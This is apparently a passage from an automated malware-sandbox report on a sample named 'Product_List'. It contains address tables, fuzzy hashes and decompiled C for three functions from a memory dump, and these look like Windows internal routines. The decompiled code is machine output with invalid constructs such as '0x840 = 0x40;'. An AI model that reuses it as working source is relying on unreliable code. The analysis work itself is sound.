                                                      0x017d6e56
                                                      0x017d6e5d
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x017d6e5f
                                                      0x017d6e67
                                                      0x017d6e77
                                                      0x017d6e7f
                                                      0x017d6e80
                                                      0x017d6e88
                                                      0x017d6e90
                                                      0x017d6e9f
                                                      0x017d6ea5
                                                      0x017d6ea9
                                                      0x017d6eb1
                                                      0x017d6ebf
                                                      0x00000000
                                                      0x00000000
                                                      0x017d6ecf
                                                      0x017d6ed3
                                                      0x00000000
                                                      0x00000000
                                                      0x017d6edb
                                                      0x017d6ede
                                                      0x017d6ee1
                                                      0x017d6ee8
                                                      0x017d6eeb
                                                      0x017d6eed
                                                      0x017d6ef0
                                                      0x017d6ef4
                                                      0x017d6ef8
                                                      0x017d6efc
                                                      0x00000000
                                                      0x00000000
                                                      0x017d6f0d
                                                      0x017d6f11
                                                      0x017d6f32
                                                      0x017d6f37
                                                      0x017d6f3b
                                                      0x017d6f3e
                                                      0x017d6f41
                                                      0x017d6f46
                                                      0x00000000
                                                      0x00000000
                                                      0x017d6f4c
                                                      0x017d6f50
                                                      0x017d6f50
                                                      0x017d6f54
                                                      0x017d6f62
                                                      0x017d6f65
                                                      0x017d6f6d
                                                      0x017d6f7b
                                                      0x017d6f7b
                                                      0x017d6f93
                                                      0x017d6f98
                                                      0x017d6fa0
                                                      0x017d6fa6
                                                      0x017d6fb3
                                                      0x017d6fb6
                                                      0x017d6fbf
                                                      0x017d6fc1
                                                      0x017d6fd5
                                                      0x017d6fda
                                                      0x017d6fda
                                                      0x017d6fdd
                                                      0x017d6fe2
                                                      0x017d6fe7
                                                      0x017d6feb
                                                      0x017d6fef
                                                      0x017d6ff3
                                                      0x0179520c
                                                      0x0179520c
                                                      0x0179520f
                                                      0x01795215
                                                      0x01795234
                                                      0x0179523a
                                                      0x0179523a
                                                      0x01795244
                                                      0x01795245
                                                      0x01795246
                                                      0x01795251
                                                      0x01795251
                                                      0x017d6f13
                                                      0x017d6f17
                                                      0x017d6f17
                                                      0x017d6f18
                                                      0x017d6f1b
                                                      0x017d6f1f
                                                      0x017d6f23
                                                      0x00000000
                                                      0x017d6f28
                                                      0x01795204
                                                      0x01795204
                                                      0x01795208
                                                      0x00000000
                                                      0x01795208
                                                      0x01795185
                                                      0x01795188
                                                      0x0179518a
                                                      0x0179518e
                                                      0x01795195
                                                      0x017d6db1
                                                      0x017d6db5
                                                      0x017d6db9
                                                      0x0179519b
                                                      0x0179519b
                                                      0x0179519e
                                                      0x017951a7
                                                      0x017951a9
                                                      0x017951a9
                                                      0x017951b5
                                                      0x017951b8
                                                      0x017951bb
                                                      0x017951be
                                                      0x017951c1
                                                      0x017951c5
                                                      0x017951c9
                                                      0x017951cd
                                                      0x017951cd
                                                      0x017951d8
                                                      0x017951dc
                                                      0x017951e0
                                                      0x017d6dcc
                                                      0x017d6dd0
                                                      0x017d6dd5
                                                      0x017d6ddd
                                                      0x017d6de1
                                                      0x017d6de1
                                                      0x017d6de5
                                                      0x017d6deb
                                                      0x017d6df1
                                                      0x017d6df7
                                                      0x017d6dfd
                                                      0x017d6e01
                                                      0x017d6e05
                                                      0x017d6e09
                                                      0x017d6e0d
                                                      0x017d6e11
                                                      0x017d6e11
                                                      0x017951eb
                                                      0x017d6e1a
                                                      0x017d6e1f
                                                      0x017d6e21
                                                      0x017d6e23
                                                      0x00000000
                                                      0x017951f1
                                                      0x017951f1
                                                      0x00000000
                                                      0x017951f1

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 18f204b71c2931ec8a5d7cecf39cfac8c4f175ade8e021cc7e25c1854a39dbe3
                                                      • Instruction ID: 25174f252a9f26661306254d2ec2bdb337510623b0b1df7c757e6118ab7e260c
                                                      • Opcode Fuzzy Hash: 18f204b71c2931ec8a5d7cecf39cfac8c4f175ade8e021cc7e25c1854a39dbe3
                                                      • Instruction Fuzzy Hash: CAC124B55083818FD755CF28C580A5AFBF1BF88304F144AAEF9998B352D771E985CB42
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 017903E2 Relevance: .3, Instructions: 254COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 74%
                                                      			E017903E2(signed int __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v56;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t56;
				signed int _t58;
				char* _t64;
				intOrPtr _t65;
				signed int _t74;
				signed int _t79;
				char* _t83;
				intOrPtr _t84;
				signed int _t93;
				signed int _t94;
				signed char* _t95;
				signed int _t99;
				signed int _t100;
				signed char* _t101;
				signed int _t105;
				signed int _t119;
				signed int _t120;
				void* _t122;
				signed int _t123;
				signed int _t127;

				_v8 =  *0x185d360 ^ _t127;
				_t119 = __ecx;
				_t105 = __edx;
				_t118 = 0;
				_v20 = __edx;
				_t120 =  *(__ecx + 0x20);
				if(E01790548(__ecx, 0) != 0) {
					_t56 = 0xc000022d;
					L23:
					return L017AB640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
				} else {
					_v12 = _v12 | 0xffffffff;
					_t58 = _t120 + 0x24;
					_t109 =  *(_t120 + 0x18);
					_t118 = _t58;
					_v16 = _t58;
					E0177B02A( *(_t120 + 0x18), _t118, 0x14a5);
					_v52 = 0x18;
					_v48 = 0;
					0x840 = 0x40;
					if( *0x1857c1c != 0) {
					}
					_v40 = 0x840;
					_v44 = _t105;
					_v36 = 0;
					_v32 = 0;
					if(E01787D50() != 0) {
						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t64 = 0x7ffe0384;
					}
					if( *_t64 != 0) {
						_t65 =  *[fs:0x30];
						__eflags =  *(_t65 + 0x240) & 0x00000004;
						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
							_t100 = E01787D50();
							__eflags = _t100;
							if(_t100 == 0) {
								_t101 = 0x7ffe0385;
							} else {
								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t101 & 0x00000020;
							if(( *_t101 & 0x00000020) != 0) {
								_t118 = _t118 | 0xffffffff;
								_t109 = 0x1485;
								E017E7016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					_t105 = 0;
					while(1) {
						_push(0x60);
						_push(5);
						_push( &_v64);
						_push( &_v52);
						_push(0x100021);
						_push( &_v12);
						_t122 = E017A9830();
						if(_t122 >= 0) {
							break;
						}
						__eflags = _t122 - 0xc0000034;
						if(_t122 == 0xc0000034) {
							L38:
							_t120 = 0xc0000135;
							break;
						}
						__eflags = _t122 - 0xc000003a;
						if(_t122 == 0xc000003a) {
							goto L38;
						}
						__eflags = _t122 - 0xc0000022;
						if(_t122 != 0xc0000022) {
							break;
						}
						__eflags = _t105;
						if(__eflags != 0) {
							break;
						}
						_t109 = _t119;
						_t99 = E017E69A6(_t119, __eflags);
						__eflags = _t99;
						if(_t99 == 0) {
							break;
						}
						_t105 = _t105 + 1;
					}
					if( !_t120 >= 0) {
						L22:
						_t56 = _t120;
						goto L23;
					}
					if( *0x1857c04 != 0) {
						_t118 = _v12;
						_t120 = L017EA7AC(_t119, _t118, _t109);
						__eflags = _t120;
						if(_t120 >= 0) {
							goto L10;
						}
						__eflags =  *0x1857bd8;
						if( *0x1857bd8 != 0) {
							L20:
							if(_v12 != 0xffffffff) {
								_push(_v12);
								E017A95D0();
							}
							goto L22;
						}
					}
					L10:
					_push(_v12);
					_t105 = _t119 + 0xc;
					_push(0x1000000);
					_push(0x10);
					_push(0);
					_push(0);
					_push(0xf);
					_push(_t105);
					_t120 = E017A99A0();
					if(_t120 < 0) {
						__eflags = _t120 - 0xc000047e;
						if(_t120 == 0xc000047e) {
							L51:
							_t74 = E017E3540(_t120);
							_t119 = _v16;
							_t120 = _t74;
							L52:
							_t118 = 0x1485;
							E0176B1E1(_t120, 0x1485, 0, _t119);
							goto L20;
						}
						__eflags = _t120 - 0xc000047f;
						if(_t120 == 0xc000047f) {
							goto L51;
						}
						__eflags = _t120 - 0xc0000462;
						if(_t120 == 0xc0000462) {
							goto L51;
						}
						_t119 = _v16;
						__eflags = _t120 - 0xc0000017;
						if(_t120 != 0xc0000017) {
							__eflags = _t120 - 0xc000009a;
							if(_t120 != 0xc000009a) {
								__eflags = _t120 - 0xc000012d;
								if(_t120 != 0xc000012d) {
									_v28 = _t119;
									_push( &_v56);
									_push(1);
									_v24 = _t120;
									_push( &_v28);
									_push(1);
									_push(2);
									_push(0xc000007b);
									_t79 = E017AAAF0();
									__eflags = _t79;
									if(_t79 >= 0) {
										__eflags =  *0x1858474 - 3;
										if( *0x1858474 != 3) {
											 *0x18579dc =  *0x18579dc + 1;
										}
									}
								}
							}
						}
						goto L52;
					}
					if(E01787D50() != 0) {
						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t83 = 0x7ffe0384;
					}
					if( *_t83 != 0) {
						_t84 =  *[fs:0x30];
						__eflags =  *(_t84 + 0x240) & 0x00000004;
						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
							_t94 = E01787D50();
							__eflags = _t94;
							if(_t94 == 0) {
								_t95 = 0x7ffe0385;
							} else {
								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t95 & 0x00000020;
							if(( *_t95 & 0x00000020) != 0) {
								E017E7016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
						if( *0x1858708 != 0) {
							_t118 =  *0x7ffe0330;
							_t123 =  *0x1857b00; // 0x0
							asm("ror esi, cl");
							 *0x185b1e0(_v12, _v20, 0x20);
							_t93 =  *(_t123 ^  *0x7ffe0330)();
							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
							asm("sbb esi, esi");
							_t120 =  ~_t50 & _t93;
						} else {
							_t120 = 0;
						}
					}
					if( !_t120 >= 0) {
						L19:
						_push( *_t105);
						E017A95D0();
						 *_t105 =  *_t105 & 0x00000000;
						goto L20;
					}
					_t120 = L01777F65(_t119);
					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
						__eflags = _t120;
						if(_t120 < 0) {
							goto L19;
						}
						 *(_t119 + 0x64) = _v12;
						goto L22;
					}
					goto L19;
				}
			}








































                                                      0x017903f1
                                                      0x017903f7
                                                      0x017903f9
                                                      0x017903fb
                                                      0x017903fd
                                                      0x01790400
                                                      0x0179040a
                                                      0x017d4c7a
                                                      0x01790537
                                                      0x01790547
                                                      0x01790410
                                                      0x01790410
                                                      0x01790414
                                                      0x01790417
                                                      0x0179041a
                                                      0x01790421
                                                      0x01790424
                                                      0x0179042b
                                                      0x0179043b
                                                      0x0179043e
                                                      0x0179043f
                                                      0x0179043f
                                                      0x01790446
                                                      0x01790449
                                                      0x0179044c
                                                      0x0179044f
                                                      0x01790459
                                                      0x017d4c8d
                                                      0x0179045f
                                                      0x0179045f
                                                      0x0179045f
                                                      0x01790467
                                                      0x017d4c97
                                                      0x017d4c9d
                                                      0x017d4ca4
                                                      0x017d4caa
                                                      0x017d4caf
                                                      0x017d4cb1
                                                      0x017d4cc3
                                                      0x017d4cb3
                                                      0x017d4cbc
                                                      0x017d4cbc
                                                      0x017d4cc8
                                                      0x017d4ccb
                                                      0x017d4cd7
                                                      0x017d4cda
                                                      0x017d4cdf
                                                      0x017d4cdf
                                                      0x017d4ccb
                                                      0x017d4ca4
                                                      0x0179046d
                                                      0x0179046f
                                                      0x0179046f
                                                      0x01790471
                                                      0x01790476
                                                      0x0179047a
                                                      0x0179047b
                                                      0x01790483
                                                      0x01790489
                                                      0x0179048d
                                                      0x00000000
                                                      0x00000000
                                                      0x017d4ce9
                                                      0x017d4cef
                                                      0x017d4d22
                                                      0x017d4d22
                                                      0x00000000
                                                      0x017d4d22
                                                      0x017d4cf1
                                                      0x017d4cf7
                                                      0x00000000
                                                      0x00000000
                                                      0x017d4cf9
                                                      0x017d4cff
                                                      0x00000000
                                                      0x00000000
                                                      0x017d4d05
                                                      0x017d4d07
                                                      0x00000000
                                                      0x00000000
                                                      0x017d4d0d
                                                      0x017d4d0f
                                                      0x017d4d14
                                                      0x017d4d16
                                                      0x00000000
                                                      0x00000000
                                                      0x017d4d1c
                                                      0x017d4d1c
                                                      0x01790499
                                                      0x01790535
                                                      0x01790535
                                                      0x00000000
                                                      0x01790535
                                                      0x017904a6
                                                      0x017d4d2c
                                                      0x017d4d37
                                                      0x017d4d39
                                                      0x017d4d3b
                                                      0x00000000
                                                      0x00000000
                                                      0x017d4d41
                                                      0x017d4d48
                                                      0x01790527
                                                      0x0179052b
                                                      0x0179052d
                                                      0x01790530
                                                      0x01790530
                                                      0x00000000
                                                      0x0179052b
                                                      0x017d4d4e
                                                      0x017904ac
                                                      0x017904ac
                                                      0x017904af
                                                      0x017904b2
                                                      0x017904b7
                                                      0x017904b9
                                                      0x017904bb
                                                      0x017904bd
                                                      0x017904bf
                                                      0x017904c5
                                                      0x017904c9
                                                      0x017d4d53
                                                      0x017d4d59
                                                      0x017d4db9
                                                      0x017d4dba
                                                      0x017d4dbf
                                                      0x017d4dc2
                                                      0x017d4dc4
                                                      0x017d4dc7
                                                      0x017d4dce
                                                      0x00000000
                                                      0x017d4dce
                                                      0x017d4d5b
                                                      0x017d4d61
                                                      0x00000000
                                                      0x00000000
                                                      0x017d4d63
                                                      0x017d4d69
                                                      0x00000000
                                                      0x00000000
                                                      0x017d4d6b
                                                      0x017d4d6e
                                                      0x017d4d74
                                                      0x017d4d76
                                                      0x017d4d7c
                                                      0x017d4d7e
                                                      0x017d4d84
                                                      0x017d4d89
                                                      0x017d4d8c
                                                      0x017d4d8d
                                                      0x017d4d92
                                                      0x017d4d95
                                                      0x017d4d96
                                                      0x017d4d98
                                                      0x017d4d9a
                                                      0x017d4d9f
                                                      0x017d4da4
                                                      0x017d4da6
                                                      0x017d4da8
                                                      0x017d4daf
                                                      0x017d4db1
                                                      0x017d4db1
                                                      0x017d4daf
                                                      0x017d4da6
                                                      0x017d4d84
                                                      0x017d4d7c
                                                      0x00000000
                                                      0x017d4d74
                                                      0x017904d6
                                                      0x017d4de1
                                                      0x017904dc
                                                      0x017904dc
                                                      0x017904dc
                                                      0x017904e4
                                                      0x017d4deb
                                                      0x017d4df1
                                                      0x017d4df8
                                                      0x017d4dfe
                                                      0x017d4e03
                                                      0x017d4e05
                                                      0x017d4e17
                                                      0x017d4e07
                                                      0x017d4e10
                                                      0x017d4e10
                                                      0x017d4e1c
                                                      0x017d4e1f
                                                      0x017d4e35
                                                      0x017d4e35
                                                      0x017d4e1f
                                                      0x017d4df8
                                                      0x017904f1
                                                      0x017904fa
                                                      0x017d4e3f
                                                      0x017d4e47
                                                      0x017d4e5b
                                                      0x017d4e61
                                                      0x017d4e67
                                                      0x017d4e69
                                                      0x017d4e71
                                                      0x017d4e73
                                                      0x01790500
                                                      0x01790500
                                                      0x01790500
                                                      0x017904fa
                                                      0x01790508
                                                      0x0179051d
                                                      0x0179051d
                                                      0x0179051f
                                                      0x01790524
                                                      0x00000000
                                                      0x01790524
                                                      0x01790515
                                                      0x01790517
                                                      0x017d4e7a
                                                      0x017d4e7c
                                                      0x00000000
                                                      0x00000000
                                                      0x017d4e85
                                                      0x00000000
                                                      0x017d4e85
                                                      0x00000000
                                                      0x01790517

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 28899e04c1cbfe1b680d7f773cae39d81116e9337c1213910f51b14a5f38c92d
                                                      • Instruction ID: 73c1bb4a368f3a431a1750a34c5ed481a83da5c4c1ee806c0917687b0fa28b14
                                                      • Opcode Fuzzy Hash: 28899e04c1cbfe1b680d7f773cae39d81116e9337c1213910f51b14a5f38c92d
                                                      • Instruction Fuzzy Hash: C0912731E00219AFEF319A6CD848BADFBF8EB05714F1502A1FA12A76E1D7749D44CB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 017E6DC9 Relevance: .2, Instructions: 199COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 79%
                                                      			E017E6DC9(signed int __ecx, void* __edx) {
				unsigned int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				void* _t87;
				void* _t95;
				signed char* _t96;
				signed int _t107;
				signed int _t136;
				signed char* _t137;
				void* _t157;
				void* _t161;
				void* _t167;
				intOrPtr _t168;
				void* _t174;
				void* _t175;
				signed int _t176;
				void* _t177;

				_t136 = __ecx;
				_v44 = 0;
				_t167 = __edx;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_v60 = 0;
				_v56 = 0;
				_v52 = 0;
				_v48 = 0;
				_v16 = __ecx;
				_t87 = L01784620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
				_t175 = _t87;
				if(_t175 != 0) {
					_t11 = _t175 + 0x30; // 0x30
					 *((short*)(_t175 + 6)) = 0x14d4;
					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
					E017E6B4C(_t167, _t11, 0x214,  &_v8);
					_v12 = _v8 + 0x10;
					_t95 = E01787D50();
					_t137 = 0x7ffe0384;
					if(_t95 == 0) {
						_t96 = 0x7ffe0384;
					} else {
						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t175);
					_push(_v12);
					_push(0x402);
					_push( *_t96 & 0x000000ff);
					E017A9AE0();
					_t87 = L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
					_t176 = _v16;
					if((_t176 & 0x00000100) != 0) {
						_push( &_v36);
						_t157 = 4;
						_t87 = E017E795D( *((intOrPtr*)(_t167 + 8)), _t157);
						if(_t87 >= 0) {
							_v24 = E017E795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
							_v28 = E017E795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
							_push( &_v52);
							_t161 = 5;
							_t168 = E017E795D( *((intOrPtr*)(_t167 + 8)), _t161);
							_v20 = _t168;
							_t107 = L01784620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
							_v16 = _t107;
							if(_t107 != 0) {
								_v8 = _v8 & 0x00000000;
								 *(_t107 + 0x20) = _t176;
								 *((short*)(_t107 + 6)) = 0x14d5;
								_t47 = _t107 + 0x24; // 0x24
								_t177 = _t47;
								E017E6B4C( &_v36, _t177, 0xc78,  &_v8);
								_t51 = _v8 + 4; // 0x4
								_t178 = _t177 + (_v8 >> 1) * 2;
								_v12 = _t51;
								E017E6B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_v12 = _v12 + _v8;
								E017E6B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_t125 = _v8;
								_v12 = _v12 + _v8;
								E017E6B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
								_t174 = _v12 + _v8;
								if(E01787D50() != 0) {
									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
								}
								_push(_v16);
								_push(_t174);
								_push(0x402);
								_push( *_t137 & 0x000000ff);
								E017A9AE0();
								L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
								_t168 = _v20;
							}
							_t87 = L01782400( &_v36);
							if(_v24 >= 0) {
								_t87 = L01782400( &_v44);
							}
							if(_t168 >= 0) {
								_t87 = L01782400( &_v52);
							}
							if(_v28 >= 0) {
								return L01782400( &_v60);
							}
						}
					}
				}
				return _t87;
			}































                                                      0x017e6dd4
                                                      0x017e6dde
                                                      0x017e6de1
                                                      0x017e6de3
                                                      0x017e6de6
                                                      0x017e6de9
                                                      0x017e6dec
                                                      0x017e6def
                                                      0x017e6df2
                                                      0x017e6df5
                                                      0x017e6dfe
                                                      0x017e6e04
                                                      0x017e6e09
                                                      0x017e6e0d
                                                      0x017e6e18
                                                      0x017e6e1b
                                                      0x017e6e22
                                                      0x017e6e2d
                                                      0x017e6e30
                                                      0x017e6e36
                                                      0x017e6e42
                                                      0x017e6e4d
                                                      0x017e6e50
                                                      0x017e6e55
                                                      0x017e6e5c
                                                      0x017e6e6e
                                                      0x017e6e5e
                                                      0x017e6e67
                                                      0x017e6e67
                                                      0x017e6e73
                                                      0x017e6e74
                                                      0x017e6e77
                                                      0x017e6e7c
                                                      0x017e6e7d
                                                      0x017e6e8e
                                                      0x017e6e93
                                                      0x017e6e9c
                                                      0x017e6ea8
                                                      0x017e6eab
                                                      0x017e6eac
                                                      0x017e6eb3
                                                      0x017e6ecd
                                                      0x017e6edc
                                                      0x017e6ee2
                                                      0x017e6ee5
                                                      0x017e6ef2
                                                      0x017e6efb
                                                      0x017e6f01
                                                      0x017e6f06
                                                      0x017e6f0b
                                                      0x017e6f11
                                                      0x017e6f1a
                                                      0x017e6f22
                                                      0x017e6f26
                                                      0x017e6f26
                                                      0x017e6f33
                                                      0x017e6f41
                                                      0x017e6f44
                                                      0x017e6f47
                                                      0x017e6f54
                                                      0x017e6f65
                                                      0x017e6f77
                                                      0x017e6f7c
                                                      0x017e6f82
                                                      0x017e6f91
                                                      0x017e6f99
                                                      0x017e6fa3
                                                      0x017e6fae
                                                      0x017e6fae
                                                      0x017e6fba
                                                      0x017e6fbb
                                                      0x017e6fbc
                                                      0x017e6fc1
                                                      0x017e6fc2
                                                      0x017e6fd3
                                                      0x017e6fd8
                                                      0x017e6fd8
                                                      0x017e6fdf
                                                      0x017e6fe8
                                                      0x017e6fee
                                                      0x017e6fee
                                                      0x017e6ff5
                                                      0x017e6ffb
                                                      0x017e6ffb
                                                      0x017e7004
                                                      0x00000000
                                                      0x017e700a
                                                      0x017e7004
                                                      0x017e6eb3
                                                      0x017e6e9c
                                                      0x017e7015

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                      • Instruction ID: d79cc218e0106129098b946eab0e17ca47a5b852667b953a1acc44048b0901f2
                                                      • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                      • Instruction Fuzzy Hash: E5717071A0021AEFDB14EFA8C948AEEFBF9FF58714F104569E505E7254DB30AA41CB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 017FB8D0 Relevance: .2, Instructions: 199COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 39%
                                                      			E017FB8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
				char _v8;
				signed int _v12;
				signed int _t80;
				signed int _t83;
				intOrPtr _t89;
				signed int _t92;
				signed char _t106;
				signed int* _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				signed int _t114;
				void* _t115;
				void* _t117;
				void* _t119;
				void* _t122;
				signed int _t123;
				signed int* _t124;

				_t106 = _a12;
				if((_t106 & 0xfffffffc) != 0) {
					return 0xc000000d;
				}
				if((_t106 & 0x00000002) != 0) {
					_t106 = _t106 | 0x00000001;
				}
				_t109 =  *0x1857b9c; // 0x0
				_t124 = L01784620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
				if(_t124 != 0) {
					 *_t124 =  *_t124 & 0x00000000;
					_t124[1] = _t124[1] & 0x00000000;
					_t124[4] = _t124[4] & 0x00000000;
					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
						L13:
						_push(_t124);
						if((_t106 & 0x00000002) != 0) {
							_push(0x200);
							_push(0x28);
							_push(0xffffffff);
							_t122 = E017A9800();
							if(_t122 < 0) {
								L33:
								if((_t124[4] & 0x00000001) != 0) {
									_push(4);
									_t64 =  &(_t124[1]); // 0x4
									_t107 = _t64;
									_push(_t107);
									_push(5);
									_push(0xfffffffe);
									E017A95B0();
									if( *_t107 != 0) {
										_push( *_t107);
										E017A95D0();
									}
								}
								_push(_t124);
								_push(0);
								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
								L37:
								L017877F0();
								return _t122;
							}
							_t124[4] = _t124[4] | 0x00000002;
							L18:
							_t108 = _a8;
							_t29 =  &(_t124[0x105]); // 0x414
							_t80 = _t29;
							_t30 =  &(_t124[5]); // 0x14
							_t124[3] = _t80;
							_t123 = 0;
							_t124[2] = _t30;
							 *_t80 = _t108;
							if(_t108 == 0) {
								L21:
								_t112 = 0x400;
								_push( &_v8);
								_v8 = 0x400;
								_push(_t124[2]);
								_push(0x400);
								_push(_t124[3]);
								_push(0);
								_push( *_t124);
								_t122 = E017A9910();
								if(_t122 != 0xc0000023) {
									L26:
									if(_t122 != 0x106) {
										L40:
										if(_t122 < 0) {
											L29:
											_t83 = _t124[2];
											if(_t83 != 0) {
												_t59 =  &(_t124[5]); // 0x14
												if(_t83 != _t59) {
													L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
												}
											}
											_push( *_t124);
											E017A95D0();
											goto L33;
										}
										 *_a16 = _t124;
										return 0;
									}
									if(_t108 != 1) {
										_t122 = 0;
										goto L40;
									}
									_t122 = 0xc0000061;
									goto L29;
								} else {
									goto L22;
								}
								while(1) {
									L22:
									_t89 =  *0x1857b9c; // 0x0
									_t92 = L01784620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
									_t124[2] = _t92;
									if(_t92 == 0) {
										break;
									}
									_t112 =  &_v8;
									_push( &_v8);
									_push(_t92);
									_push(_v8);
									_push(_t124[3]);
									_push(0);
									_push( *_t124);
									_t122 = E017A9910();
									if(_t122 != 0xc0000023) {
										goto L26;
									}
									L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
								}
								_t122 = 0xc0000017;
								goto L26;
							}
							_t119 = 0;
							do {
								_t114 = _t124[3];
								_t119 = _t119 + 0xc;
								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
								_t123 = _t123 + 1;
								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
							} while (_t123 < _t108);
							goto L21;
						}
						_push(0x28);
						_push(3);
						_t122 = L0176A7B0();
						if(_t122 < 0) {
							goto L33;
						}
						_t124[4] = _t124[4] | 0x00000001;
						goto L18;
					}
					if((_t106 & 0x00000001) == 0) {
						_t115 = 0x28;
						_t122 = L017FE7D3(_t115, _t124);
						if(_t122 < 0) {
							L9:
							_push(_t124);
							_push(0);
							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
							goto L37;
						}
						L12:
						if( *_t124 != 0) {
							goto L18;
						}
						goto L13;
					}
					_t15 =  &(_t124[1]); // 0x4
					_t117 = 4;
					_t122 = L017FE7D3(_t117, _t15);
					if(_t122 >= 0) {
						_t124[4] = _t124[4] | 0x00000001;
						_v12 = _v12 & 0x00000000;
						_push(4);
						_push( &_v12);
						_push(5);
						_push(0xfffffffe);
						E017A95B0();
						goto L12;
					}
					goto L9;
				} else {
					return 0xc0000017;
				}
			}




















                                                      0x017fb8d9
                                                      0x017fb8e4
                                                      0x00000000
                                                      0x017fb8e6
                                                      0x017fb8f3
                                                      0x017fb8f5
                                                      0x017fb8f5
                                                      0x017fb8f8
                                                      0x017fb920
                                                      0x017fb924
                                                      0x017fb936
                                                      0x017fb939
                                                      0x017fb93d
                                                      0x017fb948
                                                      0x017fb9a0
                                                      0x017fb9a0
                                                      0x017fb9a4
                                                      0x017fb9bf
                                                      0x017fb9c4
                                                      0x017fb9c6
                                                      0x017fb9cd
                                                      0x017fb9d1
                                                      0x017fbad4
                                                      0x017fbad8
                                                      0x017fbada
                                                      0x017fbadc
                                                      0x017fbadc
                                                      0x017fbadf
                                                      0x017fbae0
                                                      0x017fbae2
                                                      0x017fbae4
                                                      0x017fbaec
                                                      0x017fbaee
                                                      0x017fbaf0
                                                      0x017fbaf0
                                                      0x017fbaec
                                                      0x017fbafb
